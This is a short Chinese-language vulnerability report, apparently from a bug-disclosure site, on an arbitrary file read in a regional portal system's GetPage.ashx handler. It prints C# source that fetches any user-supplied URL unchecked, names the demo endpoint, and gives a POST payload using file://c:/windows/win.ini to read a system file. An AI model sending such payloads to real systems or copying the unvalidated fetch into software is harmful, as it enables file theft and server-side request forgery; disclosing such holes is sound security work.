Data地方门户系统 任意文件读取

漏洞作者: hello

详细说明:

地址

http://demo.htmdata.com/ashx/GetPage.ashx
 

主要源码如下

public void ProcessRequest(HttpContext context)
{
    context.Response.ContentType = "text/plain";
    string s = "";
    string requestUriString = Tool.CStr(context.Request["url"]);
    try
    {
        WebRequest request = WebRequest.Create(requestUriString);
        WebResponse response = request.GetResponse();
        Stream responseStream = response.GetResponseStream();
        using (StreamReader reader = new StreamReader(responseStream, Encoding.UTF8))
        {
            s = reader.ReadToEnd();
        }
        request.Abort();
        response.Close();
        responseStream.Dispose();
    }
    catch (Exception)
    {
    }
    context.Response.Write(s);
}
 

如果url为file://url 就可以下载任意文件了

漏洞证明:

(登陆可见是小编测试一下功能而已啦~嘿嘿~)

[dmengl2v]

漏洞证明

官网

访问
http://demo_htmdata_com/ashx/GetPage.ashx

post提交
url=file://c:/windows/win.ini

18203951b3bf45bef506d205f007b879e0c7fb7e[1]

[/dmengl2v]

发表评论